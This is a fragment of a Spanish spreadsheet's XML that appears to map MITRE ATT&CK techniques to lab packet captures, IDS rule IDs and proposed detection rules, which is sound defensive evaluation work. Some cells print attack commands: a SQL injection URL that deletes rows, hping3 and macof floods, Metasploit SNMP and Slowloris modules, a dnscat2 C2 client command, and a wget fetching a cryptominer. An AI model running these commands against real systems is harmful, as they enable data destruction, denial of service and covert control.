    <t>DHCP Spoofing</t>
  </si>
  <si>
    <t>T1557.003</t>
  </si>
  <si>
    <t>DHCPig, servidor DHCP</t>
  </si>
  <si>
    <t>T1557-Dhcp_spoofing_[1].pcapng</t>
  </si>
  <si>
    <t>2100527, 2002749, 2002752</t>
  </si>
  <si>
    <t>2002752,2002749,2100527</t>
  </si>
  <si>
    <t xml:space="preserve">Regla genérica que detecte un envío masivo de procedimientos DHCP completos (DISCOVERY, OFFER, REQUEST, ACK). Otra alternativa es una regla personalizada que analice mensajes DHCP ACK con direcciones IP de servidores DNS distinta a la establecida en la red </t>
  </si>
  <si>
    <t>Manual [1] /  2.4.2.1.2</t>
  </si>
  <si>
    <t>Manual [1] / E.19</t>
  </si>
  <si>
    <t>Agujero 196</t>
  </si>
  <si>
    <t>T1557-Hole196_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  2.1.2.1.1</t>
  </si>
  <si>
    <t>Manual [1] / E.28</t>
  </si>
  <si>
    <t>Suplantación del puente raíz</t>
  </si>
  <si>
    <t>yersinia</t>
  </si>
  <si>
    <t>T1557-Puente_raiz_[1].pcapng</t>
  </si>
  <si>
    <t>2100366, 2100384, 2002752, 2002749, 2100408</t>
  </si>
  <si>
    <t>2100384, 2002752, 2100366, 2100408, 2002749</t>
  </si>
  <si>
    <t>Si el ataque viene seguido de suplantaciones ARP, con el uso de preprocesadores de Snort resulta posible su detección. En caso de que el ataque se centre únicamente en el establecimiento del atacante como puente raíz, no existe mecanismo de detección</t>
  </si>
  <si>
    <t>Establecimiento de atacante como puente raíz</t>
  </si>
  <si>
    <t>Manual [1] /  2.1.4.1.2</t>
  </si>
  <si>
    <t>Manual [1] / E.6</t>
  </si>
  <si>
    <t>Redirección</t>
  </si>
  <si>
    <t>ettercap, netwox</t>
  </si>
  <si>
    <t>T1557-Redireccion_[1].pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2100469, 2100384, 2002752, 2002749, 2100366, 2100408, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100472</t>
    </r>
  </si>
  <si>
    <t>2100384, 2002752, 2100366, 2100469, 2100472, 2002749, 2100408</t>
  </si>
  <si>
    <t xml:space="preserve">Regla personalizada que detecte envío de paquetes ICMP Redirect por parte de un equipo que no debería intervenir en labores de redirección </t>
  </si>
  <si>
    <t>Manual [1] /  2.2.2.1.3</t>
  </si>
  <si>
    <t>Manual [1] / E.8</t>
  </si>
  <si>
    <t>Forced Authentication</t>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <t>Forzar intento de autenticación en un servidor para obtener credenciales de acceso</t>
  </si>
  <si>
    <t>SMB, NTLMssp-Extract</t>
  </si>
  <si>
    <t>T1187-Forced_Authentication_[5].pcapng, T1187-Forced_Authentication2_[5].pcapng</t>
  </si>
  <si>
    <t>44486,44484,44488</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44486,44484,44488</t>
    </r>
  </si>
  <si>
    <t>Monitorizar tráfico SMB en puertos TCP 139,445, puerto UDP 137 y tráfico WebDAV</t>
  </si>
  <si>
    <t>Servidor SMB. El atacante captura el tráfico de red del intento de autenticación mediante Wireshark y aplica fuerza bruta a las credenciales capturadas</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.5.1</t>
  </si>
  <si>
    <t>OS Credential Dumping</t>
  </si>
  <si>
    <t>T1003</t>
  </si>
  <si>
    <t>DCSync</t>
  </si>
  <si>
    <t>T1003.006</t>
  </si>
  <si>
    <t>Obtención de credenciales del usuario krbtgt (Usuario Kerberos Active Directory)</t>
  </si>
  <si>
    <t>mimikazt</t>
  </si>
  <si>
    <t>T1003-Os_credential_dumping_dcsync_[4].pcapng</t>
  </si>
  <si>
    <t>Regla compuesta que detecte una llamada DCERPC Bind a la API DRSUAPI seguida de una llamada a la función DsGetNCChanges</t>
  </si>
  <si>
    <t>Manual [4] /  3.11</t>
  </si>
  <si>
    <t>Manual [4] / B.11</t>
  </si>
  <si>
    <t>Data from Configuration Repository</t>
  </si>
  <si>
    <t>T1602</t>
  </si>
  <si>
    <t>SNMP (MIB Dump)</t>
  </si>
  <si>
    <t>T1602.001</t>
  </si>
  <si>
    <t>Recogida MIB de un equipamiento</t>
  </si>
  <si>
    <t>T1602.001.pcapng</t>
  </si>
  <si>
    <t>1411, 1417</t>
  </si>
  <si>
    <t>2101411,1411,1417</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101411,2101417</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2002752,2002749,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1411,1417</t>
    </r>
  </si>
  <si>
    <t>2002752, 2101417, 2101411, 2002749</t>
  </si>
  <si>
    <t>Regla genérica que detecte el uso del protocolo SNMP sobre UDP para acceder a la comunidad public</t>
  </si>
  <si>
    <t>Este ataque obtiene informacion de la MIB de un equipo mediante peticiones SNMP. Comando: msfconsole -x "use auxiliary/scanner/snmp/snmp_enum; set RHOSTS 192.168.2.2; run; exit"</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.8.1</t>
  </si>
  <si>
    <t>Data from Information Repositories</t>
  </si>
  <si>
    <t>T1213</t>
  </si>
  <si>
    <t>T1213.pcapng</t>
  </si>
  <si>
    <t>Robar informacion de la victima obteniendo el contenido guardado en una tabla SQL. Comando: SELECT * FROM tabla</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.6</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.6.4</t>
  </si>
  <si>
    <t>Data from Network Shared Drive</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>Descarga de archivos de interés disponibles en una red compartida</t>
  </si>
  <si>
    <t>Comando Net Use</t>
  </si>
  <si>
    <t>T1039-Data_from_network_shared_drive_[4].pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44489</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2002752, 2002749, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2044666, 2051116</t>
    </r>
  </si>
  <si>
    <t>Detección por anomalías, copia repentina de ficheros compartidos por red.</t>
  </si>
  <si>
    <t>Manual [4] /  3.15</t>
  </si>
  <si>
    <t>Manual [4] 7 B.15</t>
  </si>
  <si>
    <t>Email Collection</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>Remote Email Collection</t>
  </si>
  <si>
    <t>T1114.002</t>
  </si>
  <si>
    <t>Recolección de correos electrónicos de un servidor Microsoft Exchange haciendo uso de credenciales robadas</t>
  </si>
  <si>
    <t>PowerShell</t>
  </si>
  <si>
    <t>T1114-Email_collection_remote_email_collection_[4].pcapng</t>
  </si>
  <si>
    <t>2002752, 2002749, 2044666, 2100628</t>
  </si>
  <si>
    <t xml:space="preserve">Detección por anomalías, peticiones LDAP espontáneas desde un equipo de la red, haciendo uso de una cuenta con credenciales válidas. </t>
  </si>
  <si>
    <t>Manual [4] /  3.16</t>
  </si>
  <si>
    <t>Manual [4] / B.16</t>
  </si>
  <si>
    <t>Impact</t>
  </si>
  <si>
    <t>Data Manipulation</t>
  </si>
  <si>
    <t>T1565</t>
  </si>
  <si>
    <t>Stored Data Manipulation</t>
  </si>
  <si>
    <t>T1565.001</t>
  </si>
  <si>
    <t>T1565.001.pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">50447, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2006443</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752,2002749,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2006443</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,50447</t>
    </r>
  </si>
  <si>
    <t>Reglas personalizadas que detecten ataques de inyeccion SQL mediante la presencia del caracter "%27"</t>
  </si>
  <si>
    <t>El objetivo es generar daño en la BBDD. Queremos borrar lineas de una tabla. Comando: http://172.16.2.2:8080/contacto?apellidos=Fernandez%27;%20DELETE%20FROM%20contactos%20WHERE%20num=3--</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.8</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.8.4</t>
  </si>
  <si>
    <t>Endpoint Denial of Service</t>
  </si>
  <si>
    <t>T1499</t>
  </si>
  <si>
    <t>OS Exhaustion Flood</t>
  </si>
  <si>
    <t>T1499.001</t>
  </si>
  <si>
    <t>Denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>T1499.001.pcapng</t>
  </si>
  <si>
    <t>2012870, 40063</t>
  </si>
  <si>
    <t>2002752,2002749,2012870,40063</t>
  </si>
  <si>
    <t>Uso de metasploit para ataque DoS con herramienta Slowloris. Comando: use auxiliary/dos/http/slowloris</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.16</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.16.4</t>
  </si>
  <si>
    <t>Application or System Exploitation</t>
  </si>
  <si>
    <t>T1499.004</t>
  </si>
  <si>
    <t>Suplantación MAC</t>
  </si>
  <si>
    <t>ip</t>
  </si>
  <si>
    <t>T1499-Mac_spoof_[1].pcapng</t>
  </si>
  <si>
    <t>2100366, 2100384, 2002752, 2002749, 2100408, 2101620</t>
  </si>
  <si>
    <t xml:space="preserve">2002749, 2002752 </t>
  </si>
  <si>
    <t>Manual [1] /  2.1.1.1.2</t>
  </si>
  <si>
    <t>Manual [1] / E.2</t>
  </si>
  <si>
    <t>Service Exhaustion Flood</t>
  </si>
  <si>
    <t>T1499.002</t>
  </si>
  <si>
    <t>Reseteo de Conexión</t>
  </si>
  <si>
    <t>ettercap, netwox, nping</t>
  </si>
  <si>
    <t>T1499-Reseteo_[1].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías que identifique reseteos de conexión periódicos y desde direcciones sospechosas</t>
  </si>
  <si>
    <t>Manual [1] /  2.3.1.1.6</t>
  </si>
  <si>
    <t>Manual [1] / E.12</t>
  </si>
  <si>
    <t>Inundación SYN con suplantación</t>
  </si>
  <si>
    <t>hping3</t>
  </si>
  <si>
    <t>T1499-Syn_suplantacion_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte el envío prolongado de mensajes TCP SYN que dejan los sockets del equipo a proteger en estado SYN-RECV (no se terminan los handshake de las conexiones TCP establecidas)</t>
  </si>
  <si>
    <t>Manual [1] /  2.3.1.1.3</t>
  </si>
  <si>
    <t>Manual [1] / E.9</t>
  </si>
  <si>
    <t>LAND</t>
  </si>
  <si>
    <t>T1499-Land_[1].pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2100527, 2002752, 2002749, 2001579, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2001579</t>
    </r>
  </si>
  <si>
    <t>Regla genérica que detecte envío de mensajes TCP SYN procedentes de la misma dirección IP a la que van dirigidos los paquetes. Los puertos origen/destino pueden ser incluso idénticos</t>
  </si>
  <si>
    <t>Manual [1] /  2.3.1.1.5</t>
  </si>
  <si>
    <t>Manual [1] / E.11</t>
  </si>
  <si>
    <t>Inundación DHCP / Inanición</t>
  </si>
  <si>
    <t>DHCPig, yersinia</t>
  </si>
  <si>
    <t>T1499-Dhcp_flood_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de procedimientos DHCP completos (DISCOVERY, OFFER, REQUEST, ACK)</t>
  </si>
  <si>
    <t>Manual [1] /  2.4.2.1.1</t>
  </si>
  <si>
    <t>Manual [1] / E.18</t>
  </si>
  <si>
    <t>Reflexión SYN-ACK</t>
  </si>
  <si>
    <t>T1499-Reflexion_synack_[1].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte el envío de mensajes TCP SYN-ACK no solicitados previamente por el la red a proteger</t>
  </si>
  <si>
    <t>Manual [1] /  3.4.2</t>
  </si>
  <si>
    <t>Manual [1] / E.10</t>
  </si>
  <si>
    <t>SI                                                    (el propio ataque consiste en el envío de peticiones incompletas al servidor)</t>
  </si>
  <si>
    <t>Envio solicitudes HTTP a baja tasa</t>
  </si>
  <si>
    <t>Slowhttptest</t>
  </si>
  <si>
    <t>T1499.02-Slowhttptest-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte el envío de mensajes HTTP a baja tasa</t>
  </si>
  <si>
    <t>Uso de Slowhttptest para denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>Envio solicitudes HTTP parciales</t>
  </si>
  <si>
    <t>Slowloris</t>
  </si>
  <si>
    <t>T1499.02-Slowloris-C2018_[6].pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>15578</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,2002749,2002752</t>
    </r>
  </si>
  <si>
    <t>Regla que detecte el envío de mensajes HTTP parciales o uso de Slowloris</t>
  </si>
  <si>
    <t>Uso de Slowloris para denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>.</t>
  </si>
  <si>
    <t>Application Exhaustion Flood</t>
  </si>
  <si>
    <t>T1499.003</t>
  </si>
  <si>
    <t>Hulk</t>
  </si>
  <si>
    <t>T1499.03-Hulk-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>2002192,2002749,2002752,2002822,2012801,2012914</t>
  </si>
  <si>
    <t xml:space="preserve"> Reglas que detecen envío masivo de solicitudes a servidor web</t>
  </si>
  <si>
    <t>Uso de Hulk para denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>GoldenEye</t>
  </si>
  <si>
    <t>T1499.03-GoldenEye-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>2002749,2002752,2106897</t>
  </si>
  <si>
    <t>Uso de GoldenEye para denegación de servicio a servidor web</t>
  </si>
  <si>
    <t>Network Denial of Service</t>
  </si>
  <si>
    <t>T1498</t>
  </si>
  <si>
    <t>Direct Network Flood</t>
  </si>
  <si>
    <t>T1498.001</t>
  </si>
  <si>
    <t>Inundación tabla MAC</t>
  </si>
  <si>
    <t>Macof</t>
  </si>
  <si>
    <t>T1498.001-MAC_table_flood_[3].pcapng</t>
  </si>
  <si>
    <t>2101917,2002749,2002752,2100528,1917</t>
  </si>
  <si>
    <t>2002752, 2002749, 2101917</t>
  </si>
  <si>
    <t>Inundacion tabla MAC mediante Macof. Comando: sudo macof -i enp0s9 -d 172.16.1.1</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.18</t>
  </si>
  <si>
    <t>Manual [3] / 3.18.4</t>
  </si>
  <si>
    <t>Inundación UDP</t>
  </si>
  <si>
    <t>Low Orbit Ion Canon (LOIC) for UDP, TCP, or HTTP requests</t>
  </si>
  <si>
    <t>T1498.001-UDP_flood_1-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>402, 2002749, 2100402, 2002752</t>
  </si>
  <si>
    <t>2002749, 2002752, 2100402</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de mensajes UDP con destino el mismo puerto objetivo</t>
  </si>
  <si>
    <t>T1498.001-UDP_flood_2-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>2002749,2002752,2100402,2100525,402</t>
  </si>
  <si>
    <t>Inundación HTTP</t>
  </si>
  <si>
    <t>T1498.001-HTTP_flood-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Regla que detecte envío masivo de mensajes HTTP</t>
  </si>
  <si>
    <t>Inundación TCP</t>
  </si>
  <si>
    <t>T1498.001-TCP_flood-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>50447, 2002749, 2002752</t>
  </si>
  <si>
    <t>Regla que detecte envío masivo de mensajes TCP</t>
  </si>
  <si>
    <t xml:space="preserve">  Caldera, hping3</t>
  </si>
  <si>
    <t>T1498.001-UDP_flood_[2].pcapng</t>
  </si>
  <si>
    <t>2100525,2002752,2002749,2100402,402</t>
  </si>
  <si>
    <t>2002752, 2100402, 2002749</t>
  </si>
  <si>
    <t>Inundacion UDP en la red de la víctima. Comando: timeout 10s hping3 --udp --flood 192.168.2.2</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.10.2</t>
  </si>
  <si>
    <t>Reflection Amplification</t>
  </si>
  <si>
    <t>T1498.002</t>
  </si>
  <si>
    <t>Amplificación DNS</t>
  </si>
  <si>
    <t>dnsdrdos</t>
  </si>
  <si>
    <t>T1498-Amplif_dns_[1].pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002749, 2100402, 2002752, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100254</t>
    </r>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de respuestas DNS no solicitadas con un mismo nombre resuelto hacia la red protegida</t>
  </si>
  <si>
    <t>Manual [1] /  3.5.1</t>
  </si>
  <si>
    <t>Manual [1] / E.14</t>
  </si>
  <si>
    <t>Fraggle</t>
  </si>
  <si>
    <t>T1498-Fraggle_[1].pcapng</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100402</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de datagramas UDP hacia un puerto concreto, con fin de saturarlo y causar su inoperatividad</t>
  </si>
  <si>
    <t>Manual [1] /  3.4.5</t>
  </si>
  <si>
    <t>Manual [1] / E.13</t>
  </si>
  <si>
    <t>Smurf</t>
  </si>
  <si>
    <t>T1498-Smurf_[1].pcapng</t>
  </si>
  <si>
    <t>2100527, 2002749, 2100408, 2002752, 2101620</t>
  </si>
  <si>
    <t>2002752, 2100527, 2101620, 2100408, 2002749</t>
  </si>
  <si>
    <t>Regla genérica que detecte un envío masivo de respuestas ICMP</t>
  </si>
  <si>
    <t>Manual [1] /  3.3.1</t>
  </si>
  <si>
    <t>Manual [1] / E.7</t>
  </si>
  <si>
    <t>Inundación de TCBPDU</t>
  </si>
  <si>
    <t>T1498-Tcbpdu_[1].pcapng</t>
  </si>
  <si>
    <t>Manual [1] /  3.2.2</t>
  </si>
  <si>
    <t>Manual [1] / E.5</t>
  </si>
  <si>
    <t>Resource Hijacking</t>
  </si>
  <si>
    <t>T1496</t>
  </si>
  <si>
    <t>Descarga y puesta en marcha de software de criptominado</t>
  </si>
  <si>
    <t>XMRIG</t>
  </si>
  <si>
    <t>T1496.pcapng</t>
  </si>
  <si>
    <t>2002752,2002749,254</t>
  </si>
  <si>
    <t>Instalacion y uso de software de minado. Comando: wget https://github.com/xmrig/xmrig/releases/download/v6.11.2/xmrig-6.11.2-linux-x64.tar.gz;</t>
  </si>
  <si>
    <t>Manual [2] /  3.3.2.1</t>
  </si>
  <si>
    <t>Defacement</t>
  </si>
  <si>
    <t>T1491</t>
  </si>
  <si>
    <t>Internal Defacement</t>
  </si>
  <si>
    <t>T1491.001</t>
  </si>
  <si>
    <t>Modificar fondo de pantalla equipo victima</t>
  </si>
  <si>
    <t>T1491.001.pcapng</t>
  </si>
  <si>
    <t>Detectable por listas negras/anomalías</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.10.1</t>
  </si>
  <si>
    <t>Application Layer Protocol</t>
  </si>
  <si>
    <t>T1071</t>
  </si>
  <si>
    <t>DNS</t>
  </si>
  <si>
    <t>T1071.004</t>
  </si>
  <si>
    <t>Command - Control via DNS</t>
  </si>
  <si>
    <t>dnscat2</t>
  </si>
  <si>
    <t>T1071-Tunel_[1].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecta uso de dnscat</t>
  </si>
  <si>
    <t>Envio de peticiones DNS como canal de comunicaciones con la víctima. Comando: timeout 15s /root/dnscat2/client/dnscat --dns server=192.168.2.2,port=53 --secret= acabc17b6904a7f8fada4e7f8de4bce8 --no-encryption</t>
  </si>
  <si>
    <t>Manual [1] /  5.2.3</t>
  </si>
  <si>
    <t>Manual [1] / E.17</t>
  </si>
  <si>
    <t>Multi-Stage Channels</t>
  </si>
  <si>
    <t>T1104</t>
  </si>
  <si>
    <t>Sesión Remota + Ataque C2</t>
  </si>
  <si>
    <t>RDP, Covenant</t>
  </si>
  <si>
    <t>T1104-Multi_stage_channels_[4].pcapng</t>
  </si>
  <si>
    <t>2027792, 2027793</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027792, 2027793</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2002752, 2002749</t>
    </r>
  </si>
  <si>
    <t>Detección por anomalías. Investigación de las sesiones establecidas en el equipo atacante (siempre que sea posible) para identificar un rastro de otra dirección.</t>
  </si>
  <si>
    <t>Manual [4] /  3.22</t>
  </si>
  <si>
    <t>Manual [4] / B.22</t>
  </si>
  <si>
    <t>NO (fuera del alcance de la red a proteger)</t>
  </si>
  <si>
    <t>SI [1]. Establecimiento de conexión C&amp;C</t>
  </si>
  <si>
    <t>Fallback Channels</t>
  </si>
  <si>
    <t>T1008</t>
  </si>
  <si>
    <t>Traspaso de canal primario C2 a canal alternativo</t>
  </si>
  <si>
    <t>Covenant</t>
  </si>
  <si>
    <t>T1008-Fallback_channels_[4].pcapng</t>
  </si>
  <si>
    <t>2027792, 2027793, 2027326</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2027792, 2027793, 2027326, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44489</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2027792, 2027793, 2027326, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>44489</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002749</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101620</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2044666</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2051116</t>
    </r>
  </si>
  <si>
    <t>2002752, 2101620, 2002749</t>
  </si>
  <si>
    <t>La detección de la creación del canal es posible para este caso concreto, en el que el cortafuegos detecta la creación de ambos canales. Sin embargo, si ambos canales, tanto primario como secundario están establecidos, y no se ha detectado su creación, el cambio de uno a otro es inapreciable por el cortafuegos.</t>
  </si>
  <si>
    <t>Manual [4] /  3.19</t>
  </si>
  <si>
    <t>Manual [4] / B.19</t>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>One-Way Communication</t>
  </si>
  <si>
    <t>T1102.003</t>
  </si>
  <si>
    <t>Subida de información confidencial a Workspace de Google Drive</t>
  </si>
  <si>
    <t>Covenant, Google Drive API</t>
  </si>
  <si>
    <t>T1102.003-Web_service-one_way_communication_[4].pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF6AA84F"/>
        <sz val="11.0"/>
      </rPr>
      <t>2027792, 2027793,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2002752, 2002749, 2100628</t>
    </r>
  </si>
  <si>
    <t>Detección por anomalías, observando actividad inusual relacionada con el uso de servicios web (subidas pesadas de información a la nube, comunicación periódica con servidores web concretos, etc)</t>
  </si>
  <si>
    <t>Manual [4] /  3.21</t>
  </si>
  <si>
    <t>Manual [4] / B.21</t>
  </si>
  <si>
    <t xml:space="preserve">SI [1]. Establecimiento de conexión C&amp;C </t>
  </si>
  <si>
    <t>Proxy</t>
  </si>
  <si>
    <t>T1090</t>
  </si>
  <si>
    <t>Internal Proxy</t>
  </si>
  <si>
    <t>T1090.001</t>
  </si>
  <si>
    <t>Uso de Equipo interno como Proxy para el ataque C2</t>
  </si>
  <si>
    <t>T1090-Proxy_internal_proxy_[4].pcapng</t>
  </si>
  <si>
    <t>2027794, 2027793, 2027792</t>
  </si>
  <si>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</si>
  <si>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</si>
  <si>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t>Aunque sí es detectable la conexión C2 directa con el atacante, no existe un mecanismo de detección concreto que pueda identificar el uso de un proxy, más allá de una detección por anomalías, como la repetición de paquetes, dando a entender que un equipo interno está replicando paquetes, y por tanto está actuando como proxy</t>
  </si>
  <si>
    <t>Manual [4] /  3.20</t>
  </si>
  <si>
    <t>Manual [4] / B.20</t>
  </si>
  <si>
    <t>Data Obfuscation</t>
  </si>
  <si>
    <t>T1001</t>
  </si>
  <si>
    <t>Protocol Impersonation</t>
  </si>
  <si>
    <t>T1001.003</t>
  </si>
  <si>
    <t>Falsificación de protocolos de conexión segura como SSL o TLS</t>
  </si>
  <si>
    <t>FakeTLS (raykaryshyn Github)</t>
  </si>
  <si>
    <t>T1001-Data_obfuscation_protocol_impersonation_[4].pcapng</t>
  </si>
  <si>
    <t>20022752, 2002749</t>
  </si>
  <si>
    <t>Regla personalizada que compruebe el campo Server Name y mediante DNS asegure si se corresponde con la dirección IP a la que se está accediendo.</t>
  </si>
  <si>
    <t>Manual [4] /  3.17</t>
  </si>
  <si>
    <t>Manual [4] / B.17</t>
  </si>
  <si>
    <t>Steganography</t>
  </si>
  <si>
    <t>T1001.002</t>
  </si>
  <si>
    <t>Inserción de información confidencial en una imagen JPG</t>
  </si>
  <si>
    <t>Covenant, SSH, scp, Powershell</t>
  </si>
  <si>
    <t>T1001.002-Data_obfuscation_steganography_[4].pcapng</t>
  </si>
  <si>
    <t>2002752, 2002749, 2100628</t>
  </si>
  <si>
